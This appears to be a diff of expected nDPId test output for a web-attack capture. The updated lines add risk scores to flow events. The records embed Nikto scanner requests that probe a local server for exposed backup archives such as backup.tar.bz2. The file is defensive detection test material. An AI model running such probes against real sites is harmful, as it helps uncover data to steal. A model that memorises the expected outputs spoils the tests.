 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":356,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":356,"flow_packet_id":1,"flow_last_seen":1576420277239,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"ts_msec":1576420277239,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/HMpAAEAGH21\/AAABfwAAAcRQH5BQEyRWh8Tqd4AYAED+swAAAQEICp1m\/R+dZv0eR0VUIC8xMjcuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
-00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":356,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277239,"flow_last_seen":1576420277239,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277239,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50256,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":356,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277239,"flow_last_seen":1576420277239,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277239,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50256,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":357,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277240,"flow_last_seen":1576420277240,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420277240,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50258,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":357,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":357,"flow_packet_id":1,"flow_last_seen":1576420277240,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"ts_msec":1576420277240,"pkt":"AAAAAAAAAAAAAAAACABFAADGqKRAAEAGk4t\/AAABfwAAAcRSH5A2yZA9R5wqAoAYAED+ugAAAQEICp1m\/SCdZv0gR0VUIC9iYWNrdXAudGFyLmJ6MiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":357,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277240,"flow_last_seen":1576420277240,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420277240,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50258,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":357,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277240,"flow_last_seen":1576420277240,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420277240,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50258,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277242,"flow_last_seen":1576420277242,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420277242,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50260,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":358,"flow_packet_id":1,"flow_last_seen":1576420277242,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"ts_msec":1576420277242,"pkt":"AAAAAAAAAAAAAAAACABFAADGoOxAAEAGm0N\/AAABfwAAAcRUH5C09Jh1W5zr34AYAED+ugAAAQEICp1m\/SKdZv0iR0VUIC9iYWNrdXAudGFyLmJ6MiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
-00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277242,"flow_last_seen":1576420277242,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420277242,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50260,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277242,"flow_last_seen":1576420277242,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420277242,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50260,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":359,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277243,"flow_last_seen":1576420277243,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50262,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":359,"flow_packet_id":1,"flow_last_seen":1576420277243,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277243,"pkt":"AAAAAAAAAAAAAAAACABFAADIi9VAAEAGsFh\/AAABfwAAAcRWH5DRYLNOcO51UIAYAED+vAAAAQEICp1m\/SOdZv0jR0VUIC8xMjcuMC4wLjEudGFyLmd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
-00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":359,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277243,"flow_last_seen":1576420277243,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50262,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":359,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277243,"flow_last_seen":1576420277243,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50262,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":360,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277244,"flow_last_seen":1576420277244,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277244,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50264,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":360,"flow_packet_id":1,"flow_last_seen":1576420277244,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277244,"pkt":"AAAAAAAAAAAAAAAACABFAADIKHJAAEAGE7x\/AAABfwAAAcRYH5BlBxDwgejT24AYAED+vAAAAQEICp1m\/SSdZv0kR0VUIC8xMjcuMC4wLjEudGFyLmd6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":360,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277244,"flow_last_seen":1576420277244,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277244,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50264,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":360,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277244,"flow_last_seen":1576420277244,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277244,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50264,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":361,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277246,"flow_last_seen":1576420277246,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277246,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50266,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":361,"flow_packet_id":1,"flow_last_seen":1576420277246,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420277246,"pkt":"AAAAAAAAAAAAAAAACABFAADF\/A9AAEAGQCF\/AAABfwAAAcRaH5B2IcSTgB9qe4AYAED+uQAAAQEICp1m\/SWdZv0lR0VUIC8xMjdfMF8wXzEud2FyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":361,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277246,"flow_last_seen":1576420277246,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277246,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50266,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":361,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277246,"flow_last_seen":1576420277246,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277246,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50266,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":362,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277247,"flow_last_seen":1576420277247,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277247,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50268,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":362,"flow_packet_id":1,"flow_last_seen":1576420277247,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420277247,"pkt":"AAAAAAAAAAAAAAAACABFAADFi69AAEAGsIF\/AAABfwAAAcRcH5D\/WbMzZ3h33IAYAED+uQAAAQEICp1m\/SedZv0nR0VUIC8xMjdfMF8wXzEud2FyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":362,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277247,"flow_last_seen":1576420277247,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277247,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50268,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":362,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277247,"flow_last_seen":1576420277247,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277247,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50268,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":363,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277248,"flow_last_seen":1576420277248,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277248,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50270,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":363,"flow_packet_id":1,"flow_last_seen":1576420277248,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"ts_msec":1576420277248,"pkt":"AAAAAAAAAAAAAAAACABFAADDpjtAAEAGlfd\/AAABfwAAAcReH5CBd56aTxXXOIAYAED+twAAAQEICp1m\/SidZv0oR0VUIC8xMjcuMC4wLnppcCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":363,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277248,"flow_last_seen":1576420277248,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277248,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50270,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":363,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277248,"flow_last_seen":1576420277248,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277248,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50270,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":364,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277249,"flow_last_seen":1576420277249,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277249,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50272,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
